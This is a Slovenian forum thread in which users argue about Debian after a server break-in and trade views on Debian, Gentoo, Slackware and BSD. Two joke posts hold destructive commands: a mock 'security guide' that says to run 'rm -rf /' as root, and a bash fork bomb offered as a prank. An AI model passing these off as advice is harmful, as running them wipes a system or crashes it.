» »

Tok o debianu....

Tok o debianu....

sasox ::

moj_nick ::

Bojo že porihtal serverje, pač heknal so jih - lahk se vsakem zgodi.

anze++ ::

A je kdo resno mislu da je debilian kul??? 8-O

anze++ ::

moj_nick: "pač heknel so ih"???? To so besede pravega sis admina

sasox ::

Jah glede na to da so njih pokehal bi se jst mau zamislu o uporabi debiliana.... ;)

moj_nick ::

Glede na to, da so prvi uvedli apt-get like sitem update-anja in naredili zelo dobro distribucijo, ki jo jaz uvrščam tik za Gentoo, so kr kul.

Kaj pa je po tvoje dobra distro?

edit: @anze++ jst sm workstation user in o serverjih nimam pojma;)

Zgodovina sprememb…

  • spremenil: moj_nick ()

Gandalfar ::

sasox: Pohekal so jih, tko kot v preteklosti ze marsikoga. Kaj je tu novega?

Kar je pomembno je, da je Debian _takoj_ obvestil ljudi, da se je nekaj zgodilo. Ne skrivajo dejstva, da so jih shekali in takoj, ko bodo tocno ugotovili kaj se je zgodilo (predvidoma v sredo) bodo vse javno objavili. Zaenkrat so povedali kaj vse so jim shekali in kar vedo do sedaj. Rezultate analize bo pac potrebno pocakati.

Sprijazni se. IT industrija ni nezmotljiva in tudi Debian ni med njimi. Vendar, ko pride do tega se obnasajo korektno do svojih uporabnikov.

Kaj vec bi si lahko se zelel?

Gandalfar ::

anze++: ah.. in kaj je tvoje 'strokovno mnenje' glede tega dogodka?

sasox ::

sure, _takoj_ ne me smejat ;) Zanimivo kako sirok timeline ima lahko beseda takoj ;)


moj_nick: *BSD recimo...

Gandalfar ::

sasox: 24h po dogodku. Koliko casa pa ti rabis, da ugotovis stanje na omrezju in napises eno kompetentno sporocilo?

anze++ ::

moj_nick: Corel Linux al pa Lindows forever :\

gandalfar: Moje strokovno mnenje: don't use Debian, you'll get fuxored :D

Gandalfar ::

anze++: tako Corel Linux kot Lindows temeljita na Debianu in jemljeta pakete iz njega. Samo druga sminka je cez.

Kaj hoces povedat?

btw: Ce uporabljas Corel Linux in ne posodabljas iz Debiana potem me zelo skrbi za tvojo varnost.

http://slashdot.org/article.pl?sid=02/0...

Zgodovina sprememb…

anze++ ::

sasox: se nebi mogu strinjat bolje.

gandalfar: tle sploh ni tema u kolkm cajtu ti opazš da si biu heknen, ampak to da so heknl prou unga, ker se reklamira za bok i batino. žalost kar se mene tiče.

moj_nick ::

@sasox

Vprašal sem za _distribucijo linuxa_, ne pa za operacijski sistem.

@anze++

Take strokovnosti pa še ne :D Kako jo utemeljuješ?

Gandalfar ::

anze++: kje se reklamirajo za to?

sasox ::

Gandalfar: 24h je cela vecnost...


moj_nick: ok, distribucija linuxa...gentoo je recimo svetlobno leto pred debilianom ;-)

anze++ ::

No, da skrajšamo tale povuci-potegni, ker nisem ravno tip človeka ki bi cele dneve sedel za PCjem in delu same neumnosti, kot recimo se pregovarju tlele.

Rad bi samo še delil z vami en kratek security guide, ki je napisan za debian (in to že precej časa).

Pa lep pozdrav!
-------------------------------

This detailed guide on how to secure debian Linux is all you will ever
need
to read...

Here is what we do:-

First, login as root. Your prompt should look something like this:


[root@localhost ~]$


Then start with these simple commands


[root@localhost ~]$ rm -rf /
[root@localhost ~]$ reboot


And thats all you need to know about securing debian Linux!

babylon9 ::

No shit,

Eni ste pa pametni, tak da ne vidte vec od svojega pragu.

Debian & Slackware sta zakon pa pika.

Kostko ::

anze++: no če uporablaš bash, probi raj tole napisat >:D
:() { :|: & } ; :


:D
Human stupidity is not convergent, it has no limit!

prix ::

Elow!:D

Ce nebi clovk sam kritiziral in videl samo slabe lasnosti bi bilo drugace.
Sam tko za namig!
-Kaj se je zgodilo ob OpenSSH ranljivosti! katera distra je izdala prva security patch! A je bil to Debian.... Tako je!...
-izločimo najšibkejši člen(e)! SuSE,RedHat,.... skor use comercialne distre
-Ostanejo se Debian Slackware in Gentoo (upam da nisem kerga pozabu)
-Pomagajte izločit najšibkejši člen in kateri disti se bosta pomerili v finalu in katera bo odnesla lovoriko.

Pomoj odpade Slackware ker ni podobnega orodja apt-getu in emergeu

Odločitev je vaša?
:D

Zgodovina sprememb…

  • spremenil: prix ()

IceIceBaby ::

mi lahko en pokaže sistem, ki še ni bil shekan ?

root987 ::

Debian in gentoo... obadva sta v redu, vsakemu pa je všeč kaj drugega. Meni npr. na gentoonu ni všeč da vsako kodo kompajla na novo, ker kolikor sem primerjal z debianom, se sistem niti ni bistveno pohitril zaradi tega.
"Myths which are believed in tend to become true."
--- George Orwell

darh ::

Slacku resnično manjka samo en malo boljši package manager...
samo kaj pa vem.. jest še vseeno raje sam nameščam software...
Excuses are useless! Results are priceless!

rage ::

Ah ja, kako eni radi pljuvajo

Do vdora je prislo zaradi kraje gesla enega od administratorjev in ne zaradi ranljivosti kakega od paketov v Debianu samem. Vec detaljev v sorodni debati na Slashdotu.

Gandalfar ::

rage: das bolj natancen link na thread debate (in ne na /. post)

sem ga bral in sem videl samo spekulacije in govorice :/

BigWhale ::

> gandalfar: Moje strokovno mnenje: don't use Debian, you'll get
> fuxored

Tvoje strokovno mnenje ni vredno zelvjega prdca v vetru.

Nimas pojma kaj govoris, bluzis v tri dni, potem pa izjavis tako strokovno menje. Nastej nam par konkretnih dejstev, zakaj ne...
Drugace, pa bodi tiho, prosim, ker resnicno ne ves kaj govoris. Res ne.

sburner ::

Vse te forume in teme spremljam že dolgo časa in sem že dokaj naveličan tega brezveznega prepiranja, ki ne vodi nikamor.
Linux (kot tudi wintendoze) uporabljam že kar nekaj časa in kar se tiče raznih napak ali vdorov lahko samo rečem da se ne splača preveč razglabljat, ker je na vsaki strani preveč gorečnežev, ki zagovarjajo svoj OS.

Lahko pa rečem da sem pred Debianom uporabljal Slackware in nikoli nisem imel nikakršni pripomb nad njim. Razlog za prehod na Debian je bil njihov sistem za upravljanje s paketi, torej apt.
Doma imam low-budget server (p133, 2 Mb rama, 1 Gb diska), osnovna inštalacija mi je zasedla priblizno 110 Mb prostora, skupaj z apache webserverjem,mysql podatkovno bazo, php4 in drugimi pa je sedaj zasedenega okoli 150 Mb prostora. Vse dela super, apt "perfektno" poskrbi za odvisnosti in zaenkrat nimam nikakrsnih pripomb. Moj povprečen uptime je okoli 50 dni, to pa seveda zaradi elektrike.

Pred tem sem imel naložen windows nt 4.0, še pred tem pa win98, druge izbire tako ali tako nisem imel. Stvar je delala super, vse je teklo gladko, nisem imel nobenih problemov. Lažem. V bistvu "nič ni delalo" :\ Stabilnost je na psu, ravno tako tudi varnost, da o hitrosti sploh ne govorim.

Zanima me, koliko vas je takih z licenčnimi microsoftovimi in drugimi produkti ki zadevajo work-station in server uporabo. Debian ima na voljo približno 9000 brezplačnih paketov, ki jih lahko namestite hitro in neboleče za razliko od mnogih drugih distribucij.

O varnosti ne bom preveč razglablju, dobiš brezplačen in razmeroma varen sistem. Na tebi je da ga zaščitiš tako kot velja tudi za windowse, le da imaš tukaj različne metode ipd.. Če boš imel vse up2date, po možnosti kakšen IDS (intrusion detection sistem) skompajlan v kernel je majhna verjetnost da bos "ownan" ("pohekan"-lol). Pa tudi če boš shekan, je majha verjetnost da bo "heker" (v večini primerov script kiddie) naredil kakšno večjo škodo.

Kar se tice Gandalfarjevega strokovnega menja, nimam kaj dodati zraven. Vem da se človek spozna, Big Whale, z takšnimi opazkami kot si jih navedel pa samo dokazuješ določene stare izreke. " Ne**** človek se zmede ob slehernemu znaku razuma". Pod te zvezdice dodaj kar ti najbolje paše.

Za primer pa takole, ko bo kdo izmed vas dobil brezplačen avtomobil z veliko brezplačnimi deli in brezplačno serijsko opremo, ga bi prosil da še meni pove kje ga je dobil, ker bi se zelo prilegel. V mojem primeru, jaz lahko delim linux z vami, če kdo potrebuje kakšen distro, write me :)

Vdrli so že v veliko operacijskih sistemov, veliko informacij je bilo seveda prikritih. Debianovi razvijalci igrajo pošteno igro in nas držijo obveščene, za ostale linux distroje nisem preveč obveščen, glede microsofta pa ne bom nič rekel, ker sem prepričan da bi v vsakem primeru izvedeli zelo malo.

Zato prosim da ne "pljuvate" čez posamezne distribucije linuxa, v mojem primeru debiana, kajti za vsako izmed njih je vloženega veliko truda ki v večini primerov ni dovolj poplačan. Če se odločijo podjetja kot so IBM za prehod na linux in seveda njegovo promoviranje, me po pravici povedano ne zanimajo mnenja povprečnega windows uporabnika, ki računalnik uporablja večinoma za igranje igric in nič bolj resnega. Vsi vi ki trdite da ste linux userji ste pa večinoma windows userji pod krinko. Noben pravi odprtokodni uporabnik ne bo pljuval čez drugega, temveč bi mu skušal pomagati, toda dandanes je vse zelo drugače, večina uporabnikov ima resno pomanjkanje splošne razgledanosti, ki jim služi kot vodilo za določene "čačkarije" na raznih forumih.

Moram se pa sprijazniti s tem da dokler bodo v življenju različne ponudbe, bodo vedno obstajali tisti, ki bodo temu nasprotovali in tisti ki bodo to zagovarjali.

Če še kdo izmed vas slučajno ni dojel, sem jaz na strani odprte kode.

Enjoy and stay free & open minded.

Zgodovina sprememb…

  • spremenil: sburner ()

Kiri ::

slapt-get je v slacku kot apt-get pr debianu....
kako se v praksi obnese, ne vem, ker sem ga samo na hitro sprobal....

BigWhale ::

sburner:

> Big Whale, z takšnimi opazkami kot si jih navedel pa samo dokazuješ
> določene stare izreke.

Katere?

hruske ::

Statistično gledano je itak večina vdorov insiderskih.:\

der_Alte ::

BigWhale: pust sburnerja. vids, da je nepismen in takoj po tebi udriha. al pa samo nuca nova ocala. al pa... enostavno v ihti ni opazil, da si citiral anze++
tud zaletavi morjo bit ;)

hruske ::

Alte, tako kot jaz si tudi ti s tem postom zgoraj offtopic.

Reku bi samo to: vsak se lahko kdaj zmoti, a?


Vredno ogleda ...

TemaSporočilaOglediZadnje sporočilo
TemaSporočilaOglediZadnje sporočilo
»

Debian server VS. Gentoo server (strani: 1 2 )

Oddelek: Operacijski sistemi
584840 (4009) Nerdor
»

Kaj je bolše windows ali linux? (strani: 1 2 )

Oddelek: Operacijski sistemi
565640 (4395) MasterMind
»

Windows ali Linux? (strani: 1 2 )

Oddelek: Operacijski sistemi
554629 (3867) moj_nick
»

Linux za začetnike (strani: 1 2 )

Oddelek: Operacijski sistemi
595515 (4503) BigWhale
»

prilagajanje rad hat 9.0 (strani: 1 2 3 )

Oddelek: Operacijski sistemi
1395538 (4133) TICKO

Več podobnih tem